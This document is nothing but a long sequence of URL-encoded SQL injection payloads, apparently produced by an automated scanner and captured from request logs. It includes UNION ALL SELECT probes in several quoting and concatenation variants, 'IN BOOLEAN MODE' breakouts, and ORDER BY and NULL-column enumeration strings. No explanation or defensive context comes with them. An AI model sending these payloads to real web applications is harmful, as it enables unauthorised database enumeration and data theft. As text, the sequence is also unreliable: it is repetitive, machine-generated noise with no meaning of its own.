-6362%27%7C%7C%28SELECT%20%27KIRZ%27%20FROM%20DUAL%20WHERE%204655%3D4655%20UNION%20ALL%20SELECT%204655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%23 -2321%27%7C%7C%28SELECT%20%27bKMh%27%20FROM%20DUAL%20WHERE%206559%3D6559%20UNION%20ALL%20SELECT%206559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%2C6559%23 -1026%27%7C%7C%28SELECT%20%27FvaW%27%20FROM%20DUAL%20WHERE%202164%3D2164%20UNION%20ALL%20SELECT%202164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%23 -6255%27%7C%7C%28SELECT%20%27FoRt%27%20FROM%20DUAL%20WHERE%205892%3D5892%20UNION%20ALL%20SELECT%205892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%2C5892%23 -2651%27%7C%7C%28SELECT%20%27GaMC%27%20FROM%20DUAL%20WHERE%208437%3D8437%20UNION%20ALL%20SELECT%208437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%2C8437%23 -9062%27%7C%7C%28SELECT%20%27mrFB%27%20FROM%20DUAL%20WHERE%202565%3D2565%20UNION%20ALL%20SELECT%202565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%23 -3603%27%7C%7C%28SELECT%20%27gQpK%27%20FROM%20DUAL%20WHERE%201609%3D1609%20UNION%20ALL%20SELECT%201609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%2C1609%23 -6571%27%7C%7C%28SELECT%20%27kLdx%27%20WHERE%203881%3D3881%20UNION%20ALL%20SELECT%203881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%23 -7882%27%7C%7C%28SELECT%20%27JzcK%27%20WHERE%205741%3D5741%20UNION%20ALL%20SELECT%205741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%2C5741%23 -8528%27%7C%7C%28SELECT%20%27lIdX%27%20WHERE%204407%3D4407%20UNION%20ALL%20SELECT%204407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%23 -5307%27%7C%7C%28SELECT%20%27jCmG%27%20WHERE%208906%3D8906%20UNION%20ALL%20SELECT%208906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%23 -9312%27%7C%7C%28SELECT%20%27FLfg%27%20WHERE%203431%3D3431%20UNION%20ALL%20SELECT%203431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%2C3431%23 -4891%27%7C%7C%28SELECT%20%27UdbA%27%20WHERE%201953%3D1953%20UNION%20ALL%20SELECT%201953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%2C1953%23 -4149%27%7C%7C%28SELECT%20%27KOqM%27%20WHERE%202038%3D2038%20UNION%20ALL%20SELECT%202038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%2C2038%23 -8493%27%7C%7C%28SELECT%20%27NjWc%27%20WHERE%203182%3D3182%20UNION%20ALL%20SELECT%203182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%2C3182%23 -7902%27%7C%7C%28SELECT%20%27TwUc%27%20WHERE%205247%3D5247%20UNION%20ALL%20SELECT%205247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%2C5247%23 -6883%27%7C%7C%28SELECT%20%27PRyx%27%20WHERE%203114%3D3114%20UNION%20ALL%20SELECT%203114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%2C3114%23 -3972%27%2B%28SELECT%20KZpR%20WHERE%206445%3D6445%20UNION%20ALL%20SELECT%206445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%23 -3020%27%2B%28SELECT%20aZPM%20WHERE%203803%3D3803%20UNION%20ALL%20SELECT%203803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%2C3803%23 -2232%27%2B%28SELECT%20KXtz%20WHERE%206359%3D6359%20UNION%20ALL%20SELECT%206359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%2C6359%23 -1847%27%2B%28SELECT%20XblA%20WHERE%202955%3D2955%20UNION%20ALL%20SELECT%202955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%23 -7808%27%2B%28SELECT%20RSuL%20WHERE%207822%3D7822%20UNION%20ALL%20SELECT%207822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%2C7822%23 -1633%27%2B%28SELECT%20LprV%20WHERE%204189%3D4189%20UNION%20ALL%20SELECT%204189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%23 -9303%27%2B%28SELECT%20AddM%20WHERE%206853%3D6853%20UNION%20ALL%20SELECT%206853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%2C6853%23 -9630%27%2B%28SELECT%20flvr%20WHERE%205579%3D5579%20UNION%20ALL%20SELECT%205579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%23 -3528%27%2B%28SELECT%20bdqi%20WHERE%208965%3D8965%20UNION%20ALL%20SELECT%208965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%2C8965%23 -9937%27%2B%28SELECT%20TmmL%20WHERE%208301%3D8301%20UNION%20ALL%20SELECT%208301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%23 -6426%27%2B%28SELECT%20%27wWuN%27%20WHERE%202936%3D2936%20UNION%20ALL%20SELECT%202936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%2C2936%23 -8582%27%2B%28SELECT%20%27IwWA%27%20WHERE%207678%3D7678%20UNION%20ALL%20SELECT%207678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%2C7678%23 -1563%27%2B%28SELECT%20%27xckt%27%20WHERE%201258%3D1258%20UNION%20ALL%20SELECT%201258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%2C1258%23 -9404%27%2B%28SELECT%20%27VCgZ%27%20WHERE%204238%3D4238%20UNION%20ALL%20SELECT%204238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%2C4238%23 -6668%27%2B%28SELECT%20%27RIFx%27%20WHERE%206247%3D6247%20UNION%20ALL%20SELECT%206247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%23 -3366%27%2B%28SELECT%20%27xlcH%27%20WHERE%203165%3D3165%20UNION%20ALL%20SELECT%203165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%2C3165%23 -8340%27%2B%28SELECT%20%27hTGu%27%20WHERE%201313%3D1313%20UNION%20ALL%20SELECT%201313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%2C1313%23 -3551%27%2B%28SELECT%20%27uvCh%27%20WHERE%206786%3D6786%20UNION%20ALL%20SELECT%206786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%23 -4466%27%2B%28SELECT%20%27ELdB%27%20WHERE%201024%3D1024%20UNION%20ALL%20SELECT%201024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%23 -5404%27%2B%28SELECT%20%27yozs%27%20WHERE%202600%3D2600%20UNION%20ALL%20SELECT%202600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%2C2600%23 -2695%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%2C9588%23 -4840%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%23 -9483%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%2C1088%23 -4454%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%23 -1828%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%23 -3579%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%23 -6664%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%2C2093%23 -1746%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%2C9155%23 -6351%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%2C7435%23 -1803%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%23 1%29%20ORDER%20BY%201--%20 1%29%20ORDER%20BY%205555--%20 1%29%20UNION%20ALL%20SELECT%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20ORDER%20BY%201--%20 1%29%20ORDER%20BY%206880--%20 1%29%20UNION%20ALL%20SELECT%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20ORDER%20BY%201--%20 1%29%29%20ORDER%20BY%201678--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 